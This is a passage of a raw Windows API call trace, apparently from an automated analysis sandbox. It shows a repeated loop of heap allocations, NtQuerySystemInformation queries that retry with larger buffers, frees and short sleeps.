ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.448] Sleep (dwMilliseconds=0x110) [0217.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.456] Sleep (dwMilliseconds=0x110) [0217.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.474] Sleep (dwMilliseconds=0x110) [0217.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.486] Sleep (dwMilliseconds=0x110) [0217.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.505] Sleep (dwMilliseconds=0x110) [0217.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.519] Sleep (dwMilliseconds=0x110) [0217.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.539] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.540] Sleep (dwMilliseconds=0x110) [0217.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.548] Sleep (dwMilliseconds=0x110) [0217.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.566] Sleep (dwMilliseconds=0x110) [0217.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.582] Sleep (dwMilliseconds=0x110) [0217.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.597] Sleep (dwMilliseconds=0x110) [0217.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.615] Sleep (dwMilliseconds=0x110) [0217.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.629] Sleep (dwMilliseconds=0x110) [0217.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.642] Sleep (dwMilliseconds=0x110) [0217.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 